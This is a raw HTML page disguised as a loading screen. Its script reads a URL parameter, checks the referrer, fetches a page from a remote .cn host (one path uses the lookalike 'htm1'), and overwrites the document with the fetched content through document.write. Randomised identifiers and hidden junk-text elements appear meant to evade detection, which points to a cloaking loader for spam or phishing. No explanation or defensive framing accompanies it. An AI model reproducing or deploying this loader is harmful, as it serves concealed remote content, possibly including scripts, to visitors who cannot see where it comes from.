<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DvTB3ZZs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DvTB3ZZs .BAcwr38n {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DvTB3ZZs .content {
            line-height: 50px;
            text-align: center
        }

        .DvTB3ZZs .img {
            width: 100%
        }

        .DvTB3ZZs .VTNhnLolH {
            text-align: center
        }

        .DvTB3ZZs .VTNhnLolH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DvTB3ZZs .VTNhnLolH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DvTB3ZZs .VTNhnLolH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DvTB3ZZs .VTNhnLolH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DvTB3ZZs .VTNhnLolH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DvTB3ZZs .VTNhnLolH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DvTB3ZZs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TWzxAl3UoO1T(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OdGjVe = TWzxAl3UoO1T('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OdGjVe +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OdGjVe +".html?a=share";
		}
		
        QTiRSjYA=url+"#"+new Date().getTime();
        QTiRSjYA && function() {
            $.get(QTiRSjYA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ZH7SplVDpd4qjWjZmYWZRNSYe3lfzvEJ9v8uuJlCurHuxuqbmfNl4reXWlC61PF</b>
<span style='display:none'>FQmHYNm9Y3ZqXHeV</span>
<p  style='display:none'>Nc4XGmrzQd37gaVAYAahkZQG6ub2pCZFk4eZ9U8W3lnL</p>
<ul style='display:none' >b9d70lRAZRvhBegrI40l7R9mbUsnueQdg5MHvzJfKx27iiFu1zEaUbbeKA7oaxuupqIEqLPGtJQs24W6QOfiRyeSV2</ul>
<div style='display:none'>ic2Yhk2JAVw2pYP1qzwa6qc98Ys4h3FR9legqLi9mPxsgBTA7AFNHmf8uyrE5qx08J84XUJi618QmxTq</div>
<span style='display:none'>FQmHYNm9Y3ZqXHeV</span><div class="DvTB3ZZs">
    <div class="BAcwr38n">
        <div class="VTNhnLolH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>JgXP9vAPEN3AR4OtxfNnXP6Lnt1ho3y7LvHvwbrjoyRhdfqRBreNNm3EQW01waa6RoWl</div>
<h1 style='display:none' >NWeYLml4P6Bq9oCrTZwX0RfHM</h1>
<li style='display:none' >htDQDWc5DDB64lu9qAmxotRHIsc80mCD1hxOj</li>
<b style='display:none' >B1svFrrCef49</b>
<span style='display:none'>YGFQN7UE0u66I12L8g0wwhfHJ5h4QjNi81x1slRv2FuXpi8wa0qfh9HWF8sOvo7SA2jPgUDhLd</span></body>
</html>